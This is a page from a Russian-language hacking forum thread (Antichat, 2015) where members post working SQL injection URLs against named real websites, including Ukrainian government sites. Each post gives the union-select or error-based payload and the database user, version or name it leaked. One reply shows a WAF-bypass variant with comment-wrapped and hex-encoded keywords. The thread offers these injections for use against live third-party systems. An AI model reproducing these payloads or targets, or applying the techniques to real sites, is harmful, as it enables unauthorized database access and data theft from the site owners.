ANTICHAT - SQL Инъекции

Страница 1 из 27

Последняя »

Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - SQL Инъекции (https://forum.antichat.xyz/showthread.php?t=424558)

faza02

27.04.2015 20:15

Постим сюда найденные SQL инъекции. Прежде, чем запостить, проверьте, не выкладывалась ли SQLi ранее:

Код:

Google: site:forum.antichat.ru [ваш сайт с SQLi]

Предыдущая тема: /threads/21336/

ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно.

Правила этой темы:

Инъекции вида:

Код:

http://site.ru/index.php?a='

будут удаляться. Также желательно в посте указывать версию БД.
В теме запрещается публиковать пароли и хеши к админкам. Они будут удаляться, а нарушители - наказываться.
Флейм/оффтоп удаляется и жестко наказывается.

kingbeef

29.04.2015 13:51

Скуля с выводом в адресной строке

Код:

http://www.mmlf.ru/?go=members&sid=29%27+and+0+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13--+k

5.5.36-34.0-632.precise

gromoza

30.04.2015 09:54

Код:

http://machouse.ua/solutions/s2/pre-press/sys_ctp/treatment_digital_pl/g-j-raptor--85-polymer-cou-dlja-fotopolimernykh-plactin"and(select 1 from(select count(*),concat((select user() from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and".html

(1062) Duplicate entry 'macnew@127.0.0.11' for key 'group_key'

MaxFast

30.04.2015 10:21

Код:

http://infoeco.ru/ecomobile/index.php?id=34&datePointId=-6755 union select 1,2,3,4,5,6,concat(user(),0x3a,database()),8,9,10,11,12,13,14--

ecomobil@localhost:ecomobil

teh	03.05.2015 23:47

Код:

http://landscrona.ru/media/index.php?id=-2825%20union%20select%201,2,3,user%28%29,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15--

crona_site 5.5.25 db_crona@localhost

teh	07.05.2015 22:40

Код:

http://dzz.gov.ua/CPOSI/style/page_2/templer_page2_ru.php?id=21%20union%20select%201,2,3,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,5,%27fox%20tech%27,7,8--&table=info

znvc@localhost

5.1.73

CPOSI

Код:

http://khersonryboohorona.gov.ua/newscomdet.php?id=5&mod=-393%20union%20select%201,2,concat%28user%28%29,0x3c62723e,version%28%29,0x3c62723e,database%28%29%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&lang=

ruboohran_riba@192.168.1.28

5.5.27-log

ruboohran_riba

reuvenmatbil

09.05.2015 11:08

Код:

http://www.satena.com/about-us/board-of-directors/(select 1 and row(1,1)>(select count(*),concat(concat(CHAR(52),CHAR(67),CHAR(117),CHAR(75),CHAR(80),CHAR(112),CHAR(53),CHAR(111),CHAR(89),CHAR(89),CHAR(81)),floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

MaxFast

10.05.2015 19:29

Код:

http://www.astera.ru/it-top/?type=-2'+union+select+1,2,3,4,5,0x456e6a6f7921,7,8,9+--+&year=2015&month=2

Будьте внимательны, MySQL 4

fakecoder

14.05.2015 02:28

Код:

invest-expert.info/articles.php?article_id=-130'+union+select+(version()),2,3--+

in TITLE

8k hosts/day

кому интересно повоевать с waf... хотя faza ужо замочил...

Код:

http://www.mkap.ru/newsview.php?id=1475+and+1=1

CY 250, PR 4

faza02

14.05.2015 02:55

Цитата:

Сообщение от fakecoder

↑
кому интересно повоевать с waf

Код:

http://www.mkap.ru/newsview.php?id=1475+and+1=1

CY 250, PR 4

посты лучше склеить

Код:

http://www.mkap.ru/newsview.php?id=-1475+/*!12345union*//*!12345%73%65%6c%65%63%74*/version(),2,3,4--+

5.0.77-log

Время: 07:40

Страница 1 из 27

Последняя »

Показывать 40 сообщений этой темы на одной странице